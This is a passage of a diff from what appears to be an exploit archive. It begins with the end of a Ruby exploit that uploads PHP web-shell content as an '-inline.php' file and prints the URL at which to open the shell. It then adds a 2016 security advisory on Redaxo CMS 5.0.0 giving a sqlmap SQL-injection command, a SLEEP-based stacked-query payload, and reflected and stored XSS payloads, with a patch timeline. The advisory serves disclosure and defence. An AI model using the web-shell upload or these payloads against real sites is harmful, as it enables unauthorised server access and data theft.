||||
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
|
||||
request["Accept"] = "application/json, text/javascript, */*; q=0.01"
|
||||
request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
|
||||
request["Connection"] = "keep-alive"
|
||||
request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
|
||||
response = http.request(request)
|
||||
|
||||
puts "[Result] Status code: "+response.code
|
||||
puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
|
||||
end
|
||||
|
||||
|
70
platforms/php/webapps/39459.txt
Executable file
70
platforms/php/webapps/39459.txt
Executable file
|
@ -0,0 +1,70 @@
|
|||
=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 ===
|
||||
|
||||
Redaxo CMS contains multiple vulnerabilities
|
||||
-------------------------------------------------------------
|
||||
|
||||
Problem Overview
|
||||
================
|
||||
Technical Risk: high
|
||||
Likelihood of Exploitation: medium
|
||||
Vendor: https://www.redaxo.org/
|
||||
Tested version: Redaxo CMS v5.0.0
|
||||
Credits: LSE Leading Security Experts GmbH employee Tim Herres
|
||||
Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt
|
||||
Advisory Status: Public
|
||||
CVE-Number: na
|
||||
|
||||
Impact
|
||||
======
|
||||
Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS.
|
||||
During internal research, multiple vulnerabilities were identified in the Redaxo CMS software.
|
||||
The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way.
|
||||
Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way
|
||||
resulting in a Cross Site Scripting vulnerability.
|
||||
|
||||
Issue Description
|
||||
=================
|
||||
The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities.
|
||||
1) SQL Injection in the "Mediapool" component:
|
||||
Authentication required: yes
|
||||
User needs access to the "Mediapool".
|
||||
|
||||
POC:
|
||||
Exploitation using SQL Map
|
||||
sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name
|
||||
|
||||
Parameter: media_name (GET)
|
||||
Type: stacked queries
|
||||
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
|
||||
Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=
|
||||
|
||||
2) Reflected XSS
|
||||
Authentication required: yes
|
||||
Used browser: FF42
|
||||
Example:
|
||||
https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.<script>alert("xss");</script>&opener_input_field=
|
||||
|
||||
3) Stored XSS (persistent XSS)
|
||||
Authentication required: yes
|
||||
Used browser: FF42
|
||||
It is possible to store JavaScript Code in input fields.
|
||||
Example:
|
||||
Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field
|
||||
Payload:<script>alert("xss")</script>
|
||||
Response:
|
||||
[...]
|
||||
[...]href="index.php?page=mediapool/structure&cat_id=801"><script>alert("xss");</script></a></li></ol></div><section class="rex-page-sectio
|
||||
[...]
|
||||
|
||||
|
||||
Temporary Workaround and Fix
|
||||
============================
|
||||
Update to Version 5.0.1
|
||||
|
||||
History
|
||||
=======
|
||||
2016-01-18 Issues discovered
|
||||
2016-01-29 Vendor contacted
|
||||
2016-02-05 Vendor confirmed
|
||||
2016-02-09 Vendor released patch
|
||||
2016-02-16 Advisory released
|
Loading…
Add table
Reference in a new issue